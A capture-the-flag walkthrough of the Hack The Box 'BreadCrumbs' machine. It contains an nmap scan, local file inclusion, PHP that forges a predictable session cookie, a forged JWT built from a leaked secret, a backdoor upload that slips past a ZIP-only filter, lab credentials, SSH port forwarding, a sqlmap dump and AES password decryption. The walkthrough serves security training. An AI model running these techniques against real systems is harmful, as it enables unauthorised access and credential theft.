Hackthebox BreadCrumbs walkthrough
Methodology
- Enumeration by LFI
- PHPSESSID and JWT token forge
- Unrestricted upload
- Database leak
- Binary file analysis
- Port forwarding
- Database dump with SQLMAP
┌──(root💀m19o)-[~/HTB/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
As a penetration tester you should analyze the application to understand its functionality.
So now let's check what that button does.
From that page we can understand that the application is for reading books, and that button searches for books by title and author name.
Let's see how the application searches for books.
So I started testing the search with a random word; in my case I used "test" to understand the behavior.
I got nothing from that, so I will start my proxy, Burp Suite, to intercept that request.
After intercepting the request, as you can see there is another parameter called "method" that we couldn't see before. Now let's change the method value to 1.
I managed to generate an error by changing the method value to 1.
The first line of the error says there is a missing key in the array called book, and the second line says that file_get_contents() can't find the file. So what if we gave it a file to open?
So now we have LFI. Files.php says that we need paul's session to log in.
Let's see how this application generates a cookie.
So now we have the code that generates the cookie, let's get paul's cookie.
<?php
$username = "paul";
$max = 3;
$seed = rand(0, $max); // never used: the foreach below overwrites $seed on every iteration
foreach (range(0, $max) as $seed) {
    // the only "secret" material in the key is a single character of the username
    $key = "s4lTy_stR1nG_" . $username[$seed] . "(!528./9890";
    $session_cookie = $username . md5($key);
}
echo $session_cookie; // only the cookie from the last iteration (seed 3) survives
paul47200b180ccd6835d25d034eeb6e6390
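As an added example (Python, not code from the walkthrough or the application), this enumerates every cookie the scheme above can ever produce for a user. It shows why the "random" seed offers no protection: the candidate set is at most four values, and the snippet above only ever prints the last one. The constants are copied from the PHP above.

```python
import hashlib

# Constants copied from the cookie generator shown in the walkthrough.
PREFIX, SUFFIX, MAX_SEED = "s4lTy_stR1nG_", "(!528./9890", 3


def cookie_for_seed(username: str, seed: int) -> str:
    """One cookie exactly as the PHP builds it: username + md5(key), where
    the key differs only by the username character selected by the seed."""
    key = PREFIX + username[seed] + SUFFIX
    return username + hashlib.md5(key.encode()).hexdigest()


def cookie_candidates(username: str) -> list:
    """Every cookie the scheme can produce for this user. rand(0, $max) only
    picks a character index, so there are at most MAX_SEED + 1 distinct
    values (fewer when the username repeats a character)."""
    seen = []
    for seed in range(MAX_SEED + 1):
        cookie = cookie_for_seed(username, seed)
        if cookie not in seen:
            seen.append(cookie)
    return seen


def php_loop_result(username: str) -> str:
    """What the page's snippet actually prints: the foreach overwrites $seed,
    so only the final iteration (seed == MAX_SEED) survives."""
    return cookie_for_seed(username, MAX_SEED)


if __name__ == "__main__":
    for c in cookie_candidates("paul"):
        print(c)
    print("emitted by the PHP:", php_loop_result("paul"))
```

A session id that can be recomputed from public inputs is not a secret; the fix is a random token from a CSPRNG stored server-side, not a stronger hash of the username.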
Now we have our cookie.
Let's change it and log in.
Now we have access.
Let's check all the tabs and see what we can get.
So I can upload now! Let's check how it works.
It says a key called token is missing; I need to generate a token, so let's see how we can get one.
As you can see, login.php uses authController.php to validate, so now let's see the content of authController.php.
Now I can generate our token.
To generate a token we need the payload and the secret key as mentioned. Our payload is a multidimensional array: { "data": { "username": "paul" } }
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
Token= eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Let's upload the backdoor.
It accepts ZIP files only, so upload a zip file, replace its content with the PHP backdoor, and change the type to PHP in the filename and at the end of the request too.
Foothold
Let's start enumeration from inside. The upload dir is "Portal/Uploads"; you will find your backdoor there.
There is an interesting folder named pizzaDeliveryUserData, let's check it.
That's juicy: all users' data, but it looks like only one user is enabled, and that user is juliette. Let's check that file.
Got creds now!!
User Flag
Let's continue enumeration.
Microsoft Sticky Notes contains juicy info, let's check it.
These are database files; we need to open them on our machine to check them.
You can download the files in more than one way, use what you like.
In my case I used SCP to get the files.
Usage (remote source first, then the local destination):
scp user@10.10.10.228:"<remote path of the file you want to download>" <local destination path>
Lateral Movement
After downloading the files, look what I got!
juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]
Lateral Movement DONE
Privilege Escalation
What does the Development user have?
I tried running ./Krypter_linux and this is what it gave me:
That looks like a SQL statement, we need SQLMAP NOW!!
PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing
StatusCode : 200
StatusDescription : OK
Content : selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}
RawContent : HTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 96
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Feb 2021 19:24:09 GMT
Server: Apache/2.4.46 (Win64) ...
Forms :
Headers : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type,
text/html; charset=UTF-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 96
To use SQLMAP we need port forwarding.
In my case I used SSH:
ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228
┌──(root💀kali)-[~/HTB/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}
Let's ROLL
sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump
Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account | aes_key | password |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+
Now we need to decrypt the password.
So we need to base64-decode it and then AES-decrypt it with the key we got.
You can use this link to decrypt it:
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0